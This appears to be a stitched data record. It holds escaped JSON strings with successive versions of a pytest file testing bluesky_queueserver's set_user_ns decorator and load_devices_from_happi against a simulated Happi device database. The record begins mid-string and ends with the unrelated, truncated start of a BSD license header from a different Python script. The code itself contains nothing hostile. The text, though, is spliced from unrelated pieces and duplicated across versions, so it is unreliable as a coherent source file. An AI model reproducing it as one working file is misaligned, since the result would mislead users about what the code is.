\"name\": \"{{name}}\"\n },\n \"name\": \"motor1\",\n \"type\": \"OphydItem\"\n },\n \"tst_motor2\": {\n \"_id\": \"tst_motor2\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxisNoHints\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"tst_motor2\",\n \"type\": \"OphydItem\"\n },\n \"motor3\": {\n \"_id\": \"motor3\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxis\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor3\",\n \"type\": \"OphydItem\"\n },\n \"motor3_duplicate_error\": {\n \"_id\": \"motor3\",\n \"active\": false,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxis\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor3\",\n \"type\": \"OphydItem\"\n }\n}\n\"\"\"\n\n\ndef _configure_happi(tmp_path, monkeypatch, json_devices):\n path_json = os.path.join(tmp_path, 'sim_devices.json')\n path_ini = os.path.join(tmp_path, 'happi.ini')\n happi_ini_text = f'[DEFAULT]\\nbackend=json\\npath={path_json}'\n with open(path_ini, 'w') as f:\n f.write(happi_ini_text)\n with open(path_json, 'w') as f:\n f.write(json_devices)\n monkeypatch.setenv('HAPPI_CFG', path_ini)\n\n\[email protected]('device_names, loaded_names, kw_args, success, errmsg'\n , [([], [], {}, True, ''), (('det', 'motor'), ('det', 'motor'), {}, \n True, ''), (['det', 'motor'], ('det', 'motor'), {}, True, ''), ((('det',\n ''), ['motor', '']), ('det', 'motor'), {}, True, ''), (('det', ['motor',\n '']), ('det', 'motor'), {}, True, ''), (('det', ('motor', ''), (\n 'tst_motor2', 'motor2')), ('det', 'motor', 'motor2'), {}, True, ''), ((\n ('motor1', 'motor1_copy1'), ('motor1', 'motor1_copy2')), (\n 'motor1_copy1', 'motor1_copy2'), {}, True, ''), (10, ('det', 'motor'),\n {}, False, \"Parameter 'device_names' value must be a tuple or a list\"),\n ('string', ('det', 'motor'), {}, False,\n \"Parameter 'device_names' value must be a tuple or a list\"), (('det', \n 10), ('det', 'motor'), {}, False,\n \"Parameter 'device_names': element .* must be str, tuple or list\"), ((\n 10, 'motor'), ('det', 'motor'), {}, False,\n \"Parameter 'device_names': element .* must be str, tuple or list\"), ((\n 'det', (10, 'motor2')), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', ('tst_motor2', 10\n )), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', ('tst_motor2',\n 'motor2', 10)), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', 'motor10'), (\n 'det', 'motor10'), {}, False, 'No devices with name'), (('det',\n 'motor3'), ('det', 'motor3'), {}, False, 'Multiple devices with name'),\n (('det', 'motor3'), ('det', 'motor3'), {'active': True}, True, ''), ((\n 'det', 'motor3'), ('det', 'motor3'), {'active': False}, False,\n \"No devices with name 'det' were found in Happi database.\"), (('motor3'\n ,), ('motor3',), {'active': False}, True, ''), (('det', ['motor',\n 'motor3_new']), ('det', 'motor3_new'), {}, True, ''), (('det', ['motor',\n 'Motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'moTor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n '_motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n ' motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor ']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor_$new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n '2motor_$new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers')])\ndef test_load_devices_from_happi_1(tmp_path, monkeypatch, device_names,\n loaded_names, kw_args, success, errmsg):\n \"\"\"\n Tests for ``load_devices_from_happi``.\n \"\"\"\n _configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)\n if success:\n ns = {}\n dlist = load_devices_from_happi(device_names, namespace=ns, **kw_args)\n assert len(ns) == len(loaded_names), str(ns)\n for d in loaded_names:\n assert d in ns\n assert set(dlist) == set(loaded_names)\n else:\n with pytest.raises(Exception, match=errmsg):\n ns = {}\n load_devices_from_happi(device_names, namespace=ns, **kw_args)\n\n def _test_loading(device_names, loaded_names):\n if success:\n load_devices_from_happi(device_names, namespace=locals(), **kw_args\n )\n for d in loaded_names:\n assert d in locals()\n else:\n with pytest.raises(Exception, match=errmsg):\n load_devices_from_happi(device_names, namespace=locals(),\n **kw_args)\n _test_loading(device_names=device_names, loaded_names=loaded_names)\n\n\ndef test_load_devices_from_happi_2_fail(tmp_path, monkeypatch):\n \"\"\"\n Function ``load_devices_from_happi``: parameter ``namespace`` is required and must be of type ``dict``.\n \"\"\"\n _configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)\n with pytest.raises(TypeError, match=\n \"missing 1 required keyword-only argument: 'namespace'\"):\n load_devices_from_happi(['det', 'motor'])\n with pytest.raises(TypeError, match=\n \"Parameter 'namespace' must be a dictionary\"):\n load_devices_from_happi(['det', 'motor'], namespace=[1, 2, 3])\n",
"step-4": "import os\nimport inspect\nimport pytest\nfrom ._common import copy_default_profile_collection, patch_first_startup_file\nfrom bluesky_queueserver.manager.profile_tools import global_user_namespace, load_devices_from_happi\nfrom bluesky_queueserver.manager.profile_ops import load_profile_collection\n\n\ndef create_local_imports_files(tmp_path):\n path_dir = os.path.join(tmp_path, 'dir_local_imports')\n fln_func = os.path.join(path_dir, 'file_func.py')\n fln_gen = os.path.join(path_dir, 'file_gen.py')\n os.makedirs(path_dir, exist_ok=True)\n code1 = \"\"\"\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n# Function that has the parameter 'ipython'\n@set_user_ns\ndef f1(some_value, user_ns, ipython):\n user_ns[\"func_was_called\"] = \"func_was_called\"\n return (some_value, user_ns[\"v_from_namespace\"], bool(ipython))\n\n# Function that has no parameter 'ipython'\n@set_user_ns\ndef f1a(some_value, user_ns):\n user_ns[\"func_A_was_called\"] = \"func_was_called\"\n return (some_value, user_ns[\"v_from_namespace\"])\n\n\"\"\"\n with open(fln_func, 'w') as f:\n f.writelines(code1)\n code2 = \"\"\"\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n# Function that has the parameter 'ipython'\n@set_user_ns\ndef f2(some_value, user_ns, ipython):\n user_ns[\"gen_was_called\"] = \"gen_was_called\"\n yield (some_value, user_ns[\"v_from_namespace\"], bool(ipython))\n\n# Function that has no parameter 'ipython'\n@set_user_ns\ndef f2a(some_value, user_ns):\n user_ns[\"gen_A_was_called\"] = \"gen_was_called\"\n yield (some_value, user_ns[\"v_from_namespace\"])\n\n@set_user_ns\ndef f3(some_value, user_ns, ipython):\n user_ns[\"value_f3\"] = some_value\n\nf3(91)\n\n\"\"\"\n with open(fln_gen, 'w') as f:\n f.writelines(code2)\n\n\npatch_code = \"\"\"\nfrom dir_local_imports.file_func import f1, f1a\nfrom dir_local_imports.file_gen import f2, f2a\n\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n@set_user_ns\ndef f4(some_value, user_ns, ipython):\n user_ns[\"value_f4\"] = some_value\n\nf4(90)\n\n\"\"\"\n\n\ndef test_set_user_ns_1(tmp_path):\n \"\"\"\n Tests for ``set_user_ns`` decorator. The functionality of the decorator\n is fully tested (only without IPython):\n - using ``global_user_namespace`` to pass values in and out of the function\n defined in the imported module (emulation of ``get_ipython().user_ns``).\n - checking if the function is executed from IPython (only for the function\n defined in the imported module).\n \"\"\"\n pc_path = copy_default_profile_collection(tmp_path)\n create_local_imports_files(pc_path)\n patch_first_startup_file(pc_path, patch_code)\n nspace = load_profile_collection(pc_path)\n assert len(nspace) > 0, 'Failed to load the profile collection'\n assert 'f1' in nspace, 'Test for local imports failed'\n assert 'f2' in nspace, 'Test for local imports failed'\n assert inspect.isgeneratorfunction(nspace['f1']) is False\n assert inspect.isgeneratorfunction(nspace['f2']) is True\n\n def check_signature(func):\n params = inspect.signature(func).parameters\n assert 'user_ns' not in params\n assert 'ipython' not in params\n check_signature(nspace['f1'])\n check_signature(nspace['f1a'])\n check_signature(nspace['f2'])\n check_signature(nspace['f2a'])\n assert nspace['value_f3'] == 91\n assert nspace['value_f4'] == 90\n global_user_namespace.set_user_namespace(user_ns=nspace, use_ipython=False)\n global_user_namespace.user_ns['v_from_namespace'] = 'value-sent-to-func'\n assert nspace['v_from_namespace'] == 'value-sent-to-func'\n result_func = nspace['f1'](60)\n assert nspace['func_was_called'] == 'func_was_called'\n assert result_func[0] == 60\n assert result_func[1] == 'value-sent-to-func'\n assert result_func[2] is False\n result_func = nspace['f1a'](65)\n assert nspace['func_A_was_called'] == 'func_was_called'\n assert result_func[0] == 65\n assert result_func[1] == 'value-sent-to-func'\n global_user_namespace.user_ns['v_from_namespace'] = 'value-sent-to-gen'\n result_func = list(nspace['f2'](110))[0]\n assert nspace['gen_was_called'] == 'gen_was_called'\n assert result_func[0] == 110\n assert result_func[1] == 'value-sent-to-gen'\n assert result_func[2] is False\n result_func = list(nspace['f2a'](115))[0]\n assert nspace['gen_A_was_called'] == 'gen_was_called'\n assert result_func[0] == 115\n assert result_func[1] == 'value-sent-to-gen'\n\n\ndef test_global_user_namespace():\n \"\"\"\n Basic test for ``global_user_namespace``.\n \"\"\"\n ns = {'ab': 1, 'cd': 2}\n global_user_namespace.set_user_namespace(user_ns=ns)\n assert global_user_namespace.user_ns == ns\n assert global_user_namespace.use_ipython is False\n global_user_namespace.set_user_namespace(user_ns={}, use_ipython=True)\n assert global_user_namespace.user_ns == {}\n assert global_user_namespace.use_ipython is True\n global_user_namespace.set_user_namespace(user_ns=ns, use_ipython=False)\n assert global_user_namespace.user_ns == ns\n assert global_user_namespace.use_ipython is False\n\n\n_happi_json_db_1 = \"\"\"\n{\n \"det\": {\n \"_id\": \"det\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.DetWithCountTime\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"det\",\n \"type\": \"OphydItem\"\n },\n \"motor\": {\n \"_id\": \"motor\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxisNoPosition\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor\",\n \"type\": \"OphydItem\"\n },\n \"motor1\": {\n \"_id\": \"motor1\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxisNoHints\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor1\",\n \"type\": \"OphydItem\"\n },\n \"tst_motor2\": {\n \"_id\": \"tst_motor2\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxisNoHints\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"tst_motor2\",\n \"type\": \"OphydItem\"\n },\n \"motor3\": {\n \"_id\": \"motor3\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxis\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor3\",\n \"type\": \"OphydItem\"\n },\n \"motor3_duplicate_error\": {\n \"_id\": \"motor3\",\n \"active\": false,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxis\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor3\",\n \"type\": \"OphydItem\"\n }\n}\n\"\"\"\n\n\ndef _configure_happi(tmp_path, monkeypatch, json_devices):\n path_json = os.path.join(tmp_path, 'sim_devices.json')\n path_ini = os.path.join(tmp_path, 'happi.ini')\n happi_ini_text = f'[DEFAULT]\\nbackend=json\\npath={path_json}'\n with open(path_ini, 'w') as f:\n f.write(happi_ini_text)\n with open(path_json, 'w') as f:\n f.write(json_devices)\n monkeypatch.setenv('HAPPI_CFG', path_ini)\n\n\[email protected]('device_names, loaded_names, kw_args, success, errmsg'\n , [([], [], {}, True, ''), (('det', 'motor'), ('det', 'motor'), {}, \n True, ''), (['det', 'motor'], ('det', 'motor'), {}, True, ''), ((('det',\n ''), ['motor', '']), ('det', 'motor'), {}, True, ''), (('det', ['motor',\n '']), ('det', 'motor'), {}, True, ''), (('det', ('motor', ''), (\n 'tst_motor2', 'motor2')), ('det', 'motor', 'motor2'), {}, True, ''), ((\n ('motor1', 'motor1_copy1'), ('motor1', 'motor1_copy2')), (\n 'motor1_copy1', 'motor1_copy2'), {}, True, ''), (10, ('det', 'motor'),\n {}, False, \"Parameter 'device_names' value must be a tuple or a list\"),\n ('string', ('det', 'motor'), {}, False,\n \"Parameter 'device_names' value must be a tuple or a list\"), (('det', \n 10), ('det', 'motor'), {}, False,\n \"Parameter 'device_names': element .* must be str, tuple or list\"), ((\n 10, 'motor'), ('det', 'motor'), {}, False,\n \"Parameter 'device_names': element .* must be str, tuple or list\"), ((\n 'det', (10, 'motor2')), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', ('tst_motor2', 10\n )), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', ('tst_motor2',\n 'motor2', 10)), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', 'motor10'), (\n 'det', 'motor10'), {}, False, 'No devices with name'), (('det',\n 'motor3'), ('det', 'motor3'), {}, False, 'Multiple devices with name'),\n (('det', 'motor3'), ('det', 'motor3'), {'active': True}, True, ''), ((\n 'det', 'motor3'), ('det', 'motor3'), {'active': False}, False,\n \"No devices with name 'det' were found in Happi database.\"), (('motor3'\n ,), ('motor3',), {'active': False}, True, ''), (('det', ['motor',\n 'motor3_new']), ('det', 'motor3_new'), {}, True, ''), (('det', ['motor',\n 'Motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'moTor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n '_motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n ' motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor ']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor_$new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n '2motor_$new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers')])\ndef test_load_devices_from_happi_1(tmp_path, monkeypatch, device_names,\n loaded_names, kw_args, success, errmsg):\n \"\"\"\n Tests for ``load_devices_from_happi``.\n \"\"\"\n _configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)\n if success:\n ns = {}\n dlist = load_devices_from_happi(device_names, namespace=ns, **kw_args)\n assert len(ns) == len(loaded_names), str(ns)\n for d in loaded_names:\n assert d in ns\n assert set(dlist) == set(loaded_names)\n else:\n with pytest.raises(Exception, match=errmsg):\n ns = {}\n load_devices_from_happi(device_names, namespace=ns, **kw_args)\n\n def _test_loading(device_names, loaded_names):\n if success:\n load_devices_from_happi(device_names, namespace=locals(), **kw_args\n )\n for d in loaded_names:\n assert d in locals()\n else:\n with pytest.raises(Exception, match=errmsg):\n load_devices_from_happi(device_names, namespace=locals(),\n **kw_args)\n _test_loading(device_names=device_names, loaded_names=loaded_names)\n\n\ndef test_load_devices_from_happi_2_fail(tmp_path, monkeypatch):\n \"\"\"\n Function ``load_devices_from_happi``: parameter ``namespace`` is required and must be of type ``dict``.\n \"\"\"\n _configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)\n with pytest.raises(TypeError, match=\n \"missing 1 required keyword-only argument: 'namespace'\"):\n load_devices_from_happi(['det', 'motor'])\n with pytest.raises(TypeError, match=\n \"Parameter 'namespace' must be a dictionary\"):\n load_devices_from_happi(['det', 'motor'], namespace=[1, 2, 3])\n",
"step-5": "import os\nimport inspect\nimport pytest\n\nfrom ._common import copy_default_profile_collection, patch_first_startup_file\nfrom bluesky_queueserver.manager.profile_tools import global_user_namespace, load_devices_from_happi\nfrom bluesky_queueserver.manager.profile_ops import load_profile_collection\n\n\ndef create_local_imports_files(tmp_path):\n path_dir = os.path.join(tmp_path, \"dir_local_imports\")\n fln_func = os.path.join(path_dir, \"file_func.py\")\n fln_gen = os.path.join(path_dir, \"file_gen.py\")\n\n os.makedirs(path_dir, exist_ok=True)\n\n # Create file1\n code1 = \"\"\"\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n# Function that has the parameter 'ipython'\n@set_user_ns\ndef f1(some_value, user_ns, ipython):\n user_ns[\"func_was_called\"] = \"func_was_called\"\n return (some_value, user_ns[\"v_from_namespace\"], bool(ipython))\n\n# Function that has no parameter 'ipython'\n@set_user_ns\ndef f1a(some_value, user_ns):\n user_ns[\"func_A_was_called\"] = \"func_was_called\"\n return (some_value, user_ns[\"v_from_namespace\"])\n\n\"\"\"\n with open(fln_func, \"w\") as f:\n f.writelines(code1)\n\n # Create file2\n code2 = \"\"\"\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n# Function that has the parameter 'ipython'\n@set_user_ns\ndef f2(some_value, user_ns, ipython):\n user_ns[\"gen_was_called\"] = \"gen_was_called\"\n yield (some_value, user_ns[\"v_from_namespace\"], bool(ipython))\n\n# Function that has no parameter 'ipython'\n@set_user_ns\ndef f2a(some_value, user_ns):\n user_ns[\"gen_A_was_called\"] = \"gen_was_called\"\n yield (some_value, user_ns[\"v_from_namespace\"])\n\n@set_user_ns\ndef f3(some_value, user_ns, ipython):\n user_ns[\"value_f3\"] = some_value\n\nf3(91)\n\n\"\"\"\n with open(fln_gen, \"w\") as f:\n f.writelines(code2)\n\n\npatch_code = \"\"\"\nfrom dir_local_imports.file_func import f1, f1a\nfrom dir_local_imports.file_gen import f2, f2a\n\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n@set_user_ns\ndef f4(some_value, user_ns, ipython):\n user_ns[\"value_f4\"] = some_value\n\nf4(90)\n\n\"\"\"\n\n\ndef test_set_user_ns_1(tmp_path):\n \"\"\"\n Tests for ``set_user_ns`` decorator. The functionality of the decorator\n is fully tested (only without IPython):\n - using ``global_user_namespace`` to pass values in and out of the function\n defined in the imported module (emulation of ``get_ipython().user_ns``).\n - checking if the function is executed from IPython (only for the function\n defined in the imported module).\n \"\"\"\n pc_path = copy_default_profile_collection(tmp_path)\n\n create_local_imports_files(pc_path)\n patch_first_startup_file(pc_path, patch_code)\n\n nspace = load_profile_collection(pc_path)\n assert len(nspace) > 0, \"Failed to load the profile collection\"\n assert \"f1\" in nspace, \"Test for local imports failed\"\n assert \"f2\" in nspace, \"Test for local imports failed\"\n\n # Test if the decorator `set_user_ns` does not change function type\n assert inspect.isgeneratorfunction(nspace[\"f1\"]) is False\n assert inspect.isgeneratorfunction(nspace[\"f2\"]) is True\n\n # Check if the extra arguments are removed from the function signature\n def check_signature(func):\n params = inspect.signature(func).parameters\n assert \"user_ns\" not in params\n assert \"ipython\" not in params\n\n check_signature(nspace[\"f1\"])\n check_signature(nspace[\"f1a\"])\n check_signature(nspace[\"f2\"])\n check_signature(nspace[\"f2a\"])\n\n assert nspace[\"value_f3\"] == 91\n assert nspace[\"value_f4\"] == 90\n\n # Test function\n global_user_namespace.set_user_namespace(user_ns=nspace, use_ipython=False)\n global_user_namespace.user_ns[\"v_from_namespace\"] = \"value-sent-to-func\"\n assert nspace[\"v_from_namespace\"] == \"value-sent-to-func\"\n\n result_func = nspace[\"f1\"](60)\n assert nspace[\"func_was_called\"] == \"func_was_called\"\n assert result_func[0] == 60\n assert result_func[1] == \"value-sent-to-func\"\n assert result_func[2] is False\n\n result_func = nspace[\"f1a\"](65)\n assert nspace[\"func_A_was_called\"] == \"func_was_called\"\n assert result_func[0] == 65\n assert result_func[1] == \"value-sent-to-func\"\n\n # Test generator\n global_user_namespace.user_ns[\"v_from_namespace\"] = \"value-sent-to-gen\"\n result_func = list(nspace[\"f2\"](110))[0]\n assert nspace[\"gen_was_called\"] == \"gen_was_called\"\n assert result_func[0] == 110\n assert result_func[1] == \"value-sent-to-gen\"\n assert result_func[2] is False\n\n result_func = list(nspace[\"f2a\"](115))[0]\n assert nspace[\"gen_A_was_called\"] == \"gen_was_called\"\n assert result_func[0] == 115\n assert result_func[1] == \"value-sent-to-gen\"\n\n\ndef test_global_user_namespace():\n \"\"\"\n Basic test for ``global_user_namespace``.\n \"\"\"\n ns = {\"ab\": 1, \"cd\": 2}\n global_user_namespace.set_user_namespace(user_ns=ns)\n assert global_user_namespace.user_ns == ns\n assert global_user_namespace.use_ipython is False\n\n global_user_namespace.set_user_namespace(user_ns={}, use_ipython=True)\n assert global_user_namespace.user_ns == {}\n assert global_user_namespace.use_ipython is True\n\n global_user_namespace.set_user_namespace(user_ns=ns, use_ipython=False)\n assert global_user_namespace.user_ns == ns\n assert global_user_namespace.use_ipython is False\n\n\n_happi_json_db_1 = \"\"\"\n{\n \"det\": {\n \"_id\": \"det\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.DetWithCountTime\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"det\",\n \"type\": \"OphydItem\"\n },\n \"motor\": {\n \"_id\": \"motor\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxisNoPosition\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor\",\n \"type\": \"OphydItem\"\n },\n \"motor1\": {\n \"_id\": \"motor1\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxisNoHints\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor1\",\n \"type\": \"OphydItem\"\n },\n \"tst_motor2\": {\n \"_id\": \"tst_motor2\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxisNoHints\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"tst_motor2\",\n \"type\": \"OphydItem\"\n },\n \"motor3\": {\n \"_id\": \"motor3\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxis\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor3\",\n \"type\": \"OphydItem\"\n },\n \"motor3_duplicate_error\": {\n \"_id\": \"motor3\",\n \"active\": false,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxis\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor3\",\n \"type\": \"OphydItem\"\n }\n}\n\"\"\"\n\n\ndef _configure_happi(tmp_path, monkeypatch, json_devices):\n path_json = os.path.join(tmp_path, \"sim_devices.json\")\n path_ini = os.path.join(tmp_path, \"happi.ini\")\n\n happi_ini_text = f\"[DEFAULT]\\nbackend=json\\npath={path_json}\"\n\n with open(path_ini, \"w\") as f:\n f.write(happi_ini_text)\n\n with open(path_json, \"w\") as f:\n f.write(json_devices)\n\n monkeypatch.setenv(\"HAPPI_CFG\", path_ini)\n\n\n# fmt: off\[email protected](\"device_names, loaded_names, kw_args, success, errmsg\", [\n ([], [], {}, True, \"\"), # No devices are loaded if the list of devices is empty\n ((\"det\", \"motor\"), (\"det\", \"motor\"), {}, True, \"\"),\n ([\"det\", \"motor\"], (\"det\", \"motor\"), {}, True, \"\"),\n (((\"det\", \"\"), [\"motor\", \"\"]), (\"det\", \"motor\"), {}, True, \"\"),\n ((\"det\", [\"motor\", \"\"]), (\"det\", \"motor\"), {}, True, \"\"),\n ((\"det\", (\"motor\", \"\"), (\"tst_motor2\", \"motor2\")), (\"det\", \"motor\", \"motor2\"), {}, True, \"\"),\n # This is not typical use case, but the same device may be loaded multiple times\n # with different names if needed.\n (((\"motor1\", \"motor1_copy1\"), (\"motor1\", \"motor1_copy2\")), (\"motor1_copy1\", \"motor1_copy2\"), {}, True, \"\"),\n # Incorrect type of the device list\n (10, (\"det\", \"motor\"), {}, False, \"Parameter 'device_names' value must be a tuple or a list\"),\n (\"string\", (\"det\", \"motor\"), {}, False, \"Parameter 'device_names' value must be a tuple or a list\"),\n # Incorrecty type or form of a device list element\n ((\"det\", 10), (\"det\", \"motor\"), {}, False, \"Parameter 'device_names': element .* must be str, tuple or list\"),\n ((10, \"motor\"), (\"det\", \"motor\"), {}, False,\n \"Parameter 'device_names': element .* must be str, tuple or list\"),\n ((\"det\", (10, \"motor2\")), (\"det\", \"motor\"), {}, False, \"element .* is expected to be in the form\"),\n ((\"det\", (\"tst_motor2\", 10)), (\"det\", \"motor\"), {}, False, \"element .* is expected to be in the form\"),\n ((\"det\", (\"tst_motor2\", \"motor2\", 10)), (\"det\", \"motor\"), {}, False,\n \"element .* is expected to be in the form\"),\n # No device found\n ((\"det\", \"motor10\"), (\"det\", \"motor10\"), {}, False, \"No devices with name\"),\n # Multiple devices found (search for \"motor3\" yields multile devices, this is database issue)\n ((\"det\", \"motor3\"), (\"det\", \"motor3\"), {}, False, \"Multiple devices with name\"),\n # Use additional search parameters. (Two entries for \"motor3\" differ in the value of `active` field.\n # A single entry for `det` has `active==True`.)\n ((\"det\", \"motor3\"), (\"det\", \"motor3\"), {\"active\": True}, True, \"\"),\n ((\"det\", \"motor3\"), (\"det\", \"motor3\"), {\"active\": False}, False,\n \"No devices with name 'det' were found in Happi database.\"),\n ((\"motor3\",), (\"motor3\",), {\"active\": False}, True, \"\"),\n # Verify that valid device names are accepted\n ((\"det\", [\"motor\", \"motor3_new\"]), (\"det\", \"motor3_new\"), {}, True, \"\"),\n # Invalid new device name\n ((\"det\", [\"motor\", \"Motor\"]), (\"det\", \"motor\"), {}, False, \"may consist of lowercase letters, numbers\"),\n ((\"det\", [\"motor\", \"moTor\"]), (\"det\", \"motor\"), {}, False, \"may consist of lowercase letters, numbers\"),\n ((\"det\", [\"motor\", \"_motor\"]), (\"det\", \"motor\"), {}, False, \"may consist of lowercase letters, numbers\"),\n ((\"det\", [\"motor\", \" motor\"]), (\"det\", \"motor\"), {}, False, \"may consist of lowercase letters, numbers\"),\n ((\"det\", [\"motor\", \"motor \"]), (\"det\", \"motor\"), {}, False, \"may consist of lowercase letters, numbers\"),\n ((\"det\", [\"motor\", \"motor new\"]), (\"det\", \"motor\"), {}, False, \"may consist of lowercase letters, numbers\"),\n ((\"det\", [\"motor\", \"motor_$new\"]), (\"det\", \"motor\"), {}, False, \"may consist of lowercase letters, numbers\"),\n ((\"det\", [\"motor\", \"2motor_$new\"]), (\"det\", \"motor\"), {}, False, \"may consist of lowercase letters, numbers\"),\n])\n# fmt: on\ndef test_load_devices_from_happi_1(tmp_path, monkeypatch, device_names, loaded_names, kw_args, success, errmsg):\n \"\"\"\n Tests for ``load_devices_from_happi``.\n \"\"\"\n _configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)\n\n # Load as a dictionary\n if success:\n ns = {}\n dlist = load_devices_from_happi(device_names, namespace=ns, **kw_args)\n assert len(ns) == len(loaded_names), str(ns)\n for d in loaded_names:\n assert d in ns\n assert set(dlist) == set(loaded_names)\n else:\n with pytest.raises(Exception, match=errmsg):\n ns = {}\n load_devices_from_happi(device_names, namespace=ns, **kw_args)\n\n # Load in local namespace\n def _test_loading(device_names, loaded_names):\n if success:\n load_devices_from_happi(device_names, namespace=locals(), **kw_args)\n for d in loaded_names:\n assert d in locals()\n else:\n with pytest.raises(Exception, match=errmsg):\n load_devices_from_happi(device_names, namespace=locals(), **kw_args)\n\n _test_loading(device_names=device_names, loaded_names=loaded_names)\n\n\ndef test_load_devices_from_happi_2_fail(tmp_path, monkeypatch):\n \"\"\"\n Function ``load_devices_from_happi``: parameter ``namespace`` is required and must be of type ``dict``.\n \"\"\"\n _configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)\n\n # Missing 'namespace' parameter\n with pytest.raises(TypeError, match=\"missing 1 required keyword-only argument: 'namespace'\"):\n load_devices_from_happi([\"det\", \"motor\"])\n\n # Incorrect type of 'namespace' parameter\n with pytest.raises(TypeError, match=\"Parameter 'namespace' must be a dictionary\"):\n load_devices_from_happi([\"det\", \"motor\"], namespace=[1, 2, 3])\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
#!/usr/local/bin/python3
"""
Copyright (c) 2015-2019 Ad Schellevis <[email protected]>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
